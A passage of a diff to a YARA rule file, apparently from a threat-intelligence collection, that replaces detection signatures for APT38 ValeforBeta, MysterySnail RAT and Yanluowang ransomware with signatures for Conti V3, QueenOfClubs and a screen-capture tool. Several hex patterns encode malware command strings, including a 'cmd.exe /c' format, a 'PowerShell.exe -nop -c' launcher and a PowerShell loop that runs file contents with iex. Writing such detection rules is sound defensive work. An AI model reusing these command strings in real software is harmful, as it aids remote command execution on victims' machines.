-		$dbg1 = { 68 74 74 70 [0-1] 3a 2f 2f 25 73 25 73 }
-		$dbg2 = { 43 72 65 61 74 65 4e 61 6d 65 64 50 69 70 65 41 20 66 69 6e 69 73 68 65 64 20 77 69 74 68 20 45 72 72 6f 72 2d 25 64 }
-		$dbg3 = { 4f 53 3a 20 25 73 25 73 20 53 50 20 25 64 20 25 73 20 28 25 64 2e 25 64 2e 25 64 29 0d 0a }
-		$dbg4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 75 00 20 00 2f 00 63 00 20 00 25 00 73 }
-		$dbg5 = { 0d 0a 43 6f 6f 6b 69 65 3a 20 25 73 }
-		$dbg6 = { 25 73 5f 6d 61 69 6e }
-		$dbg7 = { 25 73 5f 66 69 6e }
-		$dbg8 = "3%3*373<3I3N3[3`3m3r3" fullword ascii
-		$s1 = { 8b 8d 80 f8 ff ff c7 41 04 01 00 00 00 83 e8 01 0f 84 aa 12 00 00 83 e8 01 0f 84 9a 12 00 00 83 e8 01 0f 84 8a 12 00 00 83 e8 01 0f 84 7a 12 00 }
-		$s2 = { 51 83 7d 08 00 75 07 b8 5b ab 66 00 eb 35 8b 45 08 89 45 fc 8b 4d fc }
+		$seq1 = { 83 ec 1c 68 80 00 00 00 68 54 21 40 00 ff 15 30 20 40 00 85 c0 0f 85 e9 00 00 00 56 57 68 48 21 40 00 89 44 24 14 89 44 24 10 c7 44 24 1c 17 00 00 00 c7 44 24 20 55 1e 00 00 c7 44 24 24 09 04 00 00 ff 15 34 20 40 00 8b 3d 3c 20 40 00 8b f0 68 34 21 40 00 56 ff d7 68 20 21 40 00 56 a3 e4 33 40 00 ff d7 a3 0c 36 40 00 8d 44 24 14 50 6a 03 8d 4c 24 20 51 68 00 00 40 00 ff 15 e4 33 40 00 85 c0 7c 1a 8b 4c 24 14 8d 54 24 0c 52 8d 44 24 14 50 51 68 00 00 40 00 ff 15 0c 36 40 00 68 18 21 40 00 ff 15 70 20 40 00 8b 54 24 10 83 c4 04 50 68 00 10 00 00 52 6a 00 ff 15 38 20 40 00 8b 4c 24 10 8b f0 8b 44 24 0c 50 51 56 e8 4a 00 00 00 8d 54 24 14 52 }
+		$seq2 = { 8b 4c 24 24 8d 44 24 20 50 51 56 e8 1d fe ff ff 83 c4 24 ff d6 8b 54 24 28 5f 89 15 08 36 40 00 5e 33 c0 83 c4 }
+		$s1 = { 3e 35 44 35 4c 35 53 35 58 35 5e 35 64 35 6c 35 72 35 79 35 }
+		$s2 = { 31 07 32 0d 32 25 32 2b 32 30 32 36 32 4c 32 6a 32 }
+		$s3 = "_invoke_watson" fullword ascii
+		$s4 = { 8b 2d bc 36 40 00 0f b6 04 2f 0f b6 da 8b 54 24 14 0f b6 14 13 8d 0c 2f 03 d6 03 c2 99 be 40 03 00 00 f7 fe 0f b6 f2 8d 04 2e e8 7f ff ff ff 8d 43 01 99 f7 7c 24 18 47 81 ff 40 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 6 of ( $dbg* ) and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and all of ( $seq* ) and 2 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT38_Valeforbeta_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Conti_V3_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect ValeforBeta used in attacks against Japanese organisations by APT38"
+		description = "Detect Conti V3 ransomware"
 		author = "Arkbird_SOLG"
-		id = "74a20725-3e52-5fef-9934-c812137dc989"
-		date = "2021-03-23"
-		modified = "2021-03-24"
+		id = "89702af3-664a-5c4a-8d2b-f195f5dddb6f"
+		date = "2020-12-15"
+		modified = "2020-12-15"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_ValeforBeta_Mar_2021_1.yar#L1-L22"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-15/Conti/Ran_Conti_V3_Nov_2020_1.yar#L24-L43"
 		license_url = "N/A"
-		logic_hash = "0ee8202b8978bf487df2a63c17d139076f2e9f68f1827a17929522060a72937a"
+		logic_hash = "2c8f2fd9b155bb4fdb1304b4d7f683bc679780d079d8bbe4fb308f94769f1392"
 		score = 50
-		quality = 67
+		quality = 75
 		tags = "FILE"
-		hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60"
 		level = "experimental"
+		hash1 = "f092b985b75a702c784f0936ce892595b91d025b26f3387a712b76dcc3a4bc81"
+		hash2 = "35ccc2b71567570bcac62e2f268faca50fa95fad6ac69e74f40856eb8f9ab03d"
 
 	strings:
-		$dbg1 = { 2f 64 64 65 00 00 00 64 64 65 65 78 65 63 }
-		$dbg2 = { 25 73 5c 53 68 65 6c 6c 4e 65 77 }
-		$dbg3 = { 25 73 20 28 25 73 3a 25 64 29 0a 25 73 }
-		$dbg4 = { 7b 25 30 38 58 2d 25 30 34 58 2d 25 30 34 58 2d 25 30 32 58 25 30 32 58 2d 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 7d }
-		$dbg5 = { 25 73 25 73 2e 64 6c 6c }
-		$dbg6 = { 25 73 5c 73 68 65 6c 6c 5c 6f 70 65 6e 5c 25 73 00 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 5c 25 73 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 74 6f 5c 25 73 00 25 73 5c 44 65 66 61 75 6c 74 49 63 6f 6e 00 00 25 73 5c 53 68 65 6c 6c 4e 65 77 00 2c 25 64 00 63 6f 6d 6d 61 6e 64 00 20 22 25 31 22 00 00 00 20 2f 70 20 22 25 31 22 00 00 00 00 20 2f 70 74 20 22 25 31 22 20 22 25 32 22 20 22 25 33 22 20 22 25 34 22 }
-		$dbg7 = { 43 4c 53 49 44 5c 25 31 5c 49 6e 50 72 6f 63 53 65 72 76 65 72 33 32 }
-		$s1 = { 74 f1 ff b5 a8 fe ff ff 8d 4b 10 c7 43 08 03 00 00 00 e8 3c cf fd ff eb da 8d 8d ac fe ff ff e8 3f 1a fc ff 83 65 fc 00 8d 85 ac fe ff ff 50 57 e8 bd fd ff ff ff b5 ac fe ff ff ff 15 24 44 47 00 85 c0 0f 85 be 00 00 00 50 50 8d 8d a0 fe ff ff 51 8d 8d 9c fe ff ff 51 50 50 50 ff b5 ac fe ff ff ff 15 70 42 47 00 85 c0 75 1f ff b5 a8 fe ff ff 53 e8 dc fe ff ff 8b 8d ac fe ff ff }
-		$s2 = { 45 fc 8b 45 0c 0f b6 48 0f 56 51 0f b6 48 0e 51 0f b6 48 0d 51 0f b6 48 0c 51 0f b6 48 0b 51 0f b6 48 0a 51 0f b6 48 09 51 0f b6 48 08 8b 75 08 83 a5 f8 fe ff ff 00 51 0f b7 48 06 51 0f b7 48 04 51 ff 30 8d 85 fc fe ff ff 68 48 aa 47 00 68 00 01 00 00 }
+		$seq1 = { 45 8c 00 8d 4d 8c c6 45 8d 7e c6 45 8e 4c c6 45 8f 0e c6 45 90 2c c6 45 91 4d c6 45 92 57 c6 45 93 13 c6 45 94 5d c6 45 95 08 c6 45 96 4c c6 45 97 77 c6 45 98 77 89 85 54 ff ff ff c6 45 99 6e 8a 45 8d e8 9f 0b 00 00 6a 6b 68 a8 21 3d be ba 0f 00 00 00 8b f0 e8 3c 3e 00 00 83 c4 08 56 ff d0 c6 45 f4 00 c6 45 f5 5a c6 45 f6 49 c6 45 f7 4c c6 45 f8 0b c6 45 f9 0b c6 45 fa 66 c6 45 fb 4c c6 45 fc 0b c6 45 fd 0b c6 45 fe 3f 89 85 50 ff ff ff 8a 45 f5 80 7d f4 00 75 2b 33 c9 66 0f 1f 84 00 00 00 00 00 8a 44 0d f5 0f b6 c0 83 e8 3f 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 54 0d f5 41 83 f9 0a 72 e0 6a 6b 68 a8 21 3d be ba 0f 00 00 00 e8 bf 3d 00 00 83 c4 08 8d 4d f5 51 ff d0 c6 85 7c ff ff ff 00 8d 8d 7c ff ff ff c6 85 7d ff ff ff 48 c6 85 7e ff ff ff 17 c6 85 7f ff ff ff 3c c6 45 80 71 c6 45 81 3c c6 45 82 37 c6 45 83 57 c6 45 84 71 c6 45 85 0a c6 45 86 67 c6 45 87 12 c6 45 88 12 89 85 3c }
+		$seq2 = { 6c ff ff ff 00 8d 8d 6c ff ff ff c6 85 6d ff ff ff 02 c6 85 6e ff ff ff 17 c6 85 6f ff ff ff 72 c6 85 70 ff ff ff 3a c6 85 71 ff ff ff 16 c6 85 72 ff ff ff 73 c6 85 73 ff ff ff 10 c6 85 74 ff ff ff 78 c6 85 75 ff ff ff 1c c6 85 76 ff ff ff 00 c6 85 77 ff ff ff 39 c6 85 78 ff ff ff 39 89 85 48 ff ff ff c6 85 79 ff ff ff 71 8a 85 6d ff ff ff e8 1d 08 00 00 6a 6b 68 a8 21 3d }
+		$seq3 = { 8b d9 89 9d b8 fd ff ff c7 85 d4 fd ff ff 0b 01 00 00 c7 85 d8 fd ff ff 0b 02 00 00 c6 85 c4 fd ff ff 00 c6 85 c5 fd ff ff 19 c6 85 c6 fd ff ff 0d c6 85 c7 fd ff ff 27 c6 85 c8 fd ff ff 1f c6 85 c9 fd ff ff 0d c6 85 ca fd ff ff 1b c6 85 cb fd ff ff 28 c6 85 cc fd ff ff 26 c6 85 cd fd ff ff 1e c6 85 ce fd ff ff 0b c6 85 cf fd ff ff 1b c6 85 d0 fd ff ff 1b 8d 8d c4 fd ff ff c6 85 d1 fd }
+		$seq4 = { c6 85 00 ff ff ff 00 c6 85 01 ff ff ff 4b c6 85 02 ff ff ff 1f c6 85 03 ff ff ff 35 c6 85 04 ff ff ff 1f c6 85 05 ff ff ff 23 c6 85 06 ff ff ff 1f c6 85 07 ff ff ff 68 c6 85 08 ff ff ff 1f c6 85 09 ff ff ff 38 c6 85 0a ff ff ff 1f c6 85 0b ff ff ff 10 c6 85 0c ff ff ff 1f c6 85 0d ff ff ff 66 c6 85 0e ff ff ff 1f c6 85 0f ff ff ff 2a c6 85 10 ff ff ff 1f c6 85 11 ff ff ff 43 c6 85 12 ff ff ff 1f c6 85 13 ff ff ff 23 c6 85 14 ff ff ff 1f c6 85 15 ff ff ff 10 c6 85 16 ff ff ff 1f c6 85 17 ff ff ff 07 c6 85 18 ff ff ff 1f c6 85 19 ff ff ff 51 c6 85 1a ff ff ff 1f c6 85 1b ff ff ff 1c c6 85 1c ff ff ff 1f c6 85 1d ff ff ff 43 c6 85 1e ff ff ff 1f c6 85 1f ff ff ff 10 c6 85 20 ff ff ff 1f c6 85 21 ff ff ff 61 c6 85 22 ff ff ff 1f c6 85 23 ff ff ff 74 c6 85 24 ff ff ff 1f c6 85 25 ff ff ff 41 c6 85 26 ff ff ff 1f c6 85 27 ff ff ff 10 c6 85 28 ff ff ff 1f c6 85 29 ff ff ff 59 c6 85 2a ff ff ff 1f c6 85 2b ff ff ff 43 c6 85 2c ff ff ff 1f c6 85 2d ff ff ff 38 c6 85 2e ff ff ff 1f c6 85 2f ff ff ff 2b c6 85 30 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $dbg* ) and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Mysterysnail_RAT_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Queenofclubs_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect MysterySnaial RAT implant"
+		description = "Detect QueenOfClubs malware"
 		author = "Arkbird_SOLG"
-		id = "2fa5015a-144f-52f6-8a5f-28fce10861e3"
-		date = "2021-10-13"
-		modified = "2021-10-14"
-		reference = "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-14/MAL_MysterySnail_RAT_Oct_2021_1.yara#L1-L25"
+		id = "d78df760-5753-528c-b03d-7bb91ec658c0"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfClubs_Jul_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "bcf072fae02b479084b8d47b4cd676216f72aecfa4ebcf8226b6997839929b57"
-		score = 50
+		logic_hash = "c6fe9dd24098ef3c281d9e6727613499988c88b9d2011af77390e0ce358bebf4"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "e84be291efadd53a8bb965bfb589590ffe870da9187e6752cc7a9f028053ff5d"
-		hash2 = "b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e"
-		hash3 = "73f520223a2e01c036a4b620c7188e733c113a429e25c5c3de7fbbc1c3d16ccc"
-		level = "experimental"
+		hash1 = "b0a1da4fc5526365df495094f65660d88487ce5e60192e5fb4075e815f9481d3"
 		tlp = "White"
-		adversary = "MysterySnail"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 57 48 83 ec 20 4c 8b c2 33 f6 0f b6 d1 41 b1 01 8b c2 c1 e8 04 41 84 c1 75 53 4d 85 c0 74 47 41 0f b7 08 8d 41 bf 66 83 f8 19 76 0a 66 83 e9 61 66 83 f9 19 77 08 66 41 83 78 02 3a 74 03 44 8a ce 45 84 c9 49 8d 40 04 49 8b c8 48 0f 45 c8 66 39 31 74 19 66 83 39 5c 74 06 66 83 39 2f 75 06 66 39 71 02 74 07 bb 00 80 00 00 eb 05 bb 40 40 00 00 66 c1 e2 07 b8 80 00 00 00 66 f7 d2 66 23 d0 b8 00 01 00 00 66 0b d0 66 0b da 4d 85 c0 74 65 ba 2e 00 00 00 49 8b c8 e8 64 4b 01 00 48 8b f8 48 85 c0 74 50 48 8d 15 a9 0d 09 00 48 8b c8 e8 5d dd 00 00 85 c0 74 39 48 8d 15 a6 0d 09 00 48 8b cf e8 4a dd 00 00 85 c0 74 26 48 8d 15 a3 0d 09 00 48 8b cf e8 37 dd 00 00 85 c0 74 13 48 8d 15 a0 0d 09 00 48 8b cf e8 24 dd 00 00 85 c0 75 04 66 83 cb 40 48 8b 74 24 38 0f b7 c3 66 c1 e8 03 66 83 e0 38 66 0b d8 0f b7 c3 66 c1 e8 06 66 83 e0 07 66 0b c3 48 8b 5c 24 30 }
-		$s2 = { 4c 8d 0d 6e 96 09 00 48 89 44 24 20 44 8b c7 48 8d 15 a7 62 0d 00 48 8b ce e8 47 17 fb ff 85 c0 0f 8e 83 00 00 00 4c 8d 0d 48 96 09 00 44 8b c7 48 8d 15 36 59 0d 00 48 8b ce e8 26 17 fb ff 85 c0 7e 66 49 8b 46 10 8b 08 81 f9 0a 04 00 00 74 1b 81 f9 3f 04 00 00 74 13 81 f9 0b 04 00 00 44 8b c3 41 0f }
-		$s3 = { 25 2a 73 70 75 62 3a 0a }
-		$s4 = { 48 81 ec b0 02 00 00 48 8b 05 7a e9 7b 00 48 33 c4 48 89 84 24 a0 02 00 00 48 8b ea 48 8d 44 24 38 48 8d 15 c0 a1 79 00 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 c7 c1 01 00 00 80 ff 15 3d 94 71 00 85 c0 75 53 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 84 24 d0 01 00 00 c7 44 24 34 01 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 e6 a1 79 00 c7 44 24 30 c7 00 00 00 ff 15 00 94 71 00 85 c0 75 0e 8b 84 24 d0 01 00 00 89 45 68 85 c0 75 07 33 c0 e9 eb 00 00 00 83 f8 01 75 f4 33 d2 48 8d 4c 24 40 41 b8 90 01 00 00 e8 f0 82 6f 00 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 44 24 40 c7 44 24 30 c8 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 90 a1 79 00 ff 15 9a 93 71 00 85 c0 75 a8 33 f6 8b fe 8b de 66 83 7c 5c 40 3a 74 15 48 83 fb 64 74 94 ff c7 48 ff c3 48 83 fb 64 7c e7 33 c0 eb 77 48 63 c7 48 8d 4c 24 42 4c 89 b4 24 d0 02 00 00 4c 8d 34 00 49 03 ce e8 2f ad 6f 00 89 45 64 49 81 }
-		$s5 = { 48 8d 4c 24 60 ff 97 18 04 00 00 33 f6 c7 45 90 01 00 00 00 0f 57 c0 48 89 74 24 68 33 c9 66 0f 7f 44 24 70 48 89 75 80 48 89 75 88 c7 45 94 01 00 00 00 48 c7 45 9c 01 00 00 00 48 89 75 a8 e8 32 97 6f 00 8d 4e 01 48 89 45 b0 e8 26 97 6f 00 8d 4e 02 48 89 45 b8 e8 1a 97 6f 00 48 89 45 c0 45 33 c9 48 8d 45 d0 45 33 c0 48 89 44 24 48 48 8b d3 48 8d 44 24 60 33 c9 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 89 74 24 28 c7 44 24 20 01 00 00 00 ff 97 90 03 00 00 85 c0 74 0a 48 8b 4d d8 ff 15 da 8f 71 00 48 8b 4d d0 ff 15 d0 8f 71 00 b9 10 27 00 00 ff 15 b5 8f 71 00 0f 10 05 96 9c 79 00 48 8d 4d 08 33 d2 f2 0f 10 0d 98 9c 79 00 41 b8 b8 07 00 00 0f 29 45 f0 f2 0f 11 4d 00 e8 84 7d 6f 00 4c 8d 05 65 9c 79 00 48 8d 55 f0 48 8d 4c 24 58 e8 c3 98 6f 00 85 c0 0f 85 af 00 00 00 48 8b 4c 24 58 44 8d 40 02 33 d2 e8 db aa 6f 00 48 8b 4c 24 58 e8 71 94 6f 00 48 8b 4c 24 58 45 33 c0 33 d2 48 63 d8 e8 bf aa 6f 00 8d 4b 01 48 63 c9 e8 d4 67 6f 00 4c 8b 4c 24 58 4c 8b c3 ba 01 00 00 00 48 8b c8 48 8b f0 e8 58 f5 6f 00 48 8b 4c 24 58 48 8b d8 e8 47 99 6f 00 b9 64 00 00 00 ff 15 08 8f 71 00 48 83 bf f0 03 00 00 00 75 11 b9 42 6e aa cf e8 8c e7 ff ff 48 89 87 f0 03 00 00 48 8d 4d f0 ff 97 f0 03 00 00 44 8b cb 89 5c 24 50 4c 8b c6 48 8d 54 24 50 49 8b ce e8 44 d7 5c 00 48 8b ce 85 }
+		$s1 = { 66 00 6f 00 72 00 28 00 3b 00 3b 00 29 00 7b 00 24 00 53 00 3d 00 47 00 65 00 74 00 2d 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 20 00 22 00 25 00 73 00 22 00 3b 00 49 00 46 00 28 00 24 00 53 00 29 00 7b 00 22 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 69 00 65 00 78 00 20 00 24 00 53 00 20 00 32 00 3e 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 24 00 74 00 2b 00 27 00 20 00 27 00 3b 00 65 00 63 00 68 00 6f 00 20 00 24 00 74 00 20 00 3e 00 3e 00 22 00 25 00 73 00 22 00 3b 00 7d 00 73 00 6c 00 65 00 65 00 70 00 20 00 2d 00 6d 00 20 00 36 00 30 00 30 00 3b 00 7d }
+		$s2 = { 50 00 6f 00 77 00 65 00 72 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 2d 00 6e 00 6f 00 70 00 20 00 2d 00 63 00 20 00 25 00 73 }
+		$s3 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
+		$s4 = { 5c 00 7e 00 74 00 6d 00 70 00 5f 00 [6-20] ( 00 2e 00 6a 00 70 00 67 | 00 2e 00 70 00 73 00 31) }
+		$s5 = { c7 45 d8 ac 89 41 00 c7 45 dc 00 00 00 00 6a 01 68 00 00 40 04 8d 55 d8 52 68 c8 89 41 00 68 e0 89 41 00 8b 45 c0 83 c0 08 50 68 ec 89 41 00 8b 4d f4 51 ff 15 78 62 41 00 8b 55 c0 89 42 04 8b 45 c0 83 78 04 00 75 19 8b 4d f0 51 ff 15 74 62 41 00 8b 55 f4 52 ff 15 74 62 41 00 e9 14 ff ff ff 68 3c 04 00 00 e8 b7 70 00 00 83 c4 04 89 45 d0 8b 45 d0 89 45 e0 68 ec 01 00 00 e8 a1 70 00 00 83 c4 04 89 45 cc 8b 4d cc 89 4d d4 8b 55 c0 8b 32 b9 7b 00 00 00 8b 7d d4 f3 a5 6a 01 8b 45 c0 83 c0 1c 50 68 ec 01 00 00 8b 4d d4 51 68 c1 f5 09 00 8b 55 c0 83 c2 20 52 e8 04 ef ff ff }
+		$s6 = "http://bot.google.com" fullword ascii
+		$s7 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 00 00 25 00 73 00 00 00 00 00 25 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 500KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 35KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Yanluowang_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_Tool_Screencapture_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Yanluowang ransomware"
+		description = "Detect Screen Capture utility"
 		author = "Arkbird_SOLG"
-		id = "339d3dab-9bdd-5a46-8261-c32862ccc3bf"
-		date = "2021-12-17"
-		modified = "2021-12-18"
-		reference = "https://samples.vx-underground.org/samples/Families/YanluowangRansomware/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-18/RAN_Yanluowang_Dec_2021_1.yara#L1-L20"
+		id = "09e4295e-454a-519a-964e-c5295e603aef"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/Tool_ScreenCapture_Jul_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "0144874fb24411b4378a2e2992934e674808f01ecc38f23d0d9d37e1d45621e4"
+		logic_hash = "dff6c722ec001f5e3b5c53b41f8d457ab69ae46316f5dc7bbf1d00eb3d1ed3c8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d"
-		hash2 = "d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "f441e6239b592ac15538a8ba8903e5874283b066050a5a7e514ce33e84237f4e"
+		tlp = "White"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 6a 00 68 7b 4d 45 00 e8 52 2a 00 00 6a 00 6a 00 68 44 58 45 00 68 78 58 45 00 68 d8 56 45 00 c6 45 fc 15 8b 3d d8 71 44 00 6a 00 ff d7 6a 00 6a 00 68 80 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 a0 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 b8 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 cc 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 e4 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 fc 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 10 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 2c 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 40 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 54 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 68 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 88 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 a0 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 b8 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 d0 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 ec 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 00 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 14 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 28 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 40 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 54 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 80 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 68 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 7c 5a 45 00 68 78 58 45 00 }
-		$s2 = { 83 bd d4 ee ff ff 10 8d 85 c0 ee ff ff 51 0f 43 85 c0 ee ff ff 8d 8d 90 ee ff ff 50 6a 30 68 a0 56 45 00 8d 85 c0 ee ff ff 50 ff b5 e8 ee ff ff e8 83 45 00 00 83 bd a4 ee ff ff 10 8d 85 90 ee ff ff 6a 00 0f 43 85 90 ee ff ff 6a 00 50 68 d4 56 45 00 68 d8 56 45 00 6a 00 ff d7 8b 95 a4 ee ff ff 83 fa 10 72 2f 8b 8d 90 ee ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc }
-		$s3 = { 68 00 00 00 f0 6a 01 6a 00 6a 00 8d 85 5c ee ff ff 50 ff 15 14 70 44 00 8d 85 40 ee ff ff 50 57 6a 01 ff b5 5c ee ff ff ff 15 40 70 44 00 8b 35 1c 70 44 00 8d 85 60 ec ff ff 6a 20 50 6a 00 6a 00 6a 01 6a 00 ff b5 40 ee ff ff c7 85 e8 ee ff ff 20 00 00 00 c7 85 60 ec ff ff 20 00 00 00 ff d6 ff b5 60 ec ff ff e8 1f cc 01 00 8b 8d 50 ec ff ff 83 c4 04 89 85 4c ec ff ff 0f 10 01 0f 11 00 0f 10 41 10 8d 8d e8 ee ff ff 0f 11 40 10 ff b5 60 ec ff ff 51 50 6a 00 6a 01 6a 00 ff b5 40 ee ff ff ff d6 8d 85 6c ec ff ff 33 ff 50 57 6a 01 68 80 00 00 00 ff b5 4c ec ff ff 89 bd 40 ec ff ff 89 bd bc ee ff ff ff 15 3c 70 44 00 85 c0 74 47 ff b5 6c ec ff ff e8 ae cb 01 00 83 c4 04 8b f0 8d 85 6c ec ff ff 89 b5 bc ee ff ff 50 56 6a 01 68 80 00 00 00 ff b5 4c ec ff ff ff 15 3c 70 44 00 85 }
-		$s4 = { 8b ec 6a ff 68 2b 52 44 00 64 a1 00 00 00 00 50 81 ec 8c 02 00 00 a1 c0 c8 45 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 6a 05 33 c0 c7 45 c0 00 00 00 00 68 84 57 45 00 8d 4d c0 c7 45 d0 00 00 00 00 c7 45 d4 07 00 00 00 66 89 45 c0 e8 59 3f 00 00 c7 45 fc 00 00 00 00 8d 4d d8 6a 03 33 c0 c7 45 d8 00 00 00 00 68 90 57 45 00 c7 45 e8 00 00 00 00 c7 45 ec 07 00 00 00 66 89 45 d8 e8 28 3f 00 00 6a 00 6a 0f c7 45 fc 01 00 00 00 ff 15 98 70 44 00 8b f0 89 b5 74 fd ff ff 83 fe ff 0f 84 2c 02 00 00 a1 9c 70 44 00 8d 7d c0 8b 0d 48 70 44 00 89 85 7c fd ff ff a1 80 70 44 00 89 85 78 fd ff ff a1 4c 70 44 00 89 85 80 fd ff ff a1 90 70 44 00 c7 85 88 fd ff ff 00 00 00 00 89 bd 84 fd ff ff 89 8d 6c fd ff ff 89 85 70 fd ff ff 66 66 66 }
+		$s1 = "@MyScreen.jpg" fullword wide
+		$s2 = "DISPLAY" fullword wide
+		$s3 = "_invoke_watson" fullword ascii
+		$s4 = "GdipSaveImageToStream" fullword ascii
+		$s5 = { 8b 57 04 89 4d e8 8d 4d e8 51 52 e8 16 0c 00 00 85 c0 74 03 89 47 08 8b 75 e8 81 fe 00 04 00 00 77 18 56 e8 ac f9 ff ff 83 c4 04 84 c0 74 0b 8b c6 e8 9e 15 00 00 8b f4 eb 35 83 c8 ff 2b c6 83 f8 08 72 15 8d 46 08 50 ff 15 f4 30 40 00 83 c4 04 85 }
 
 	condition:
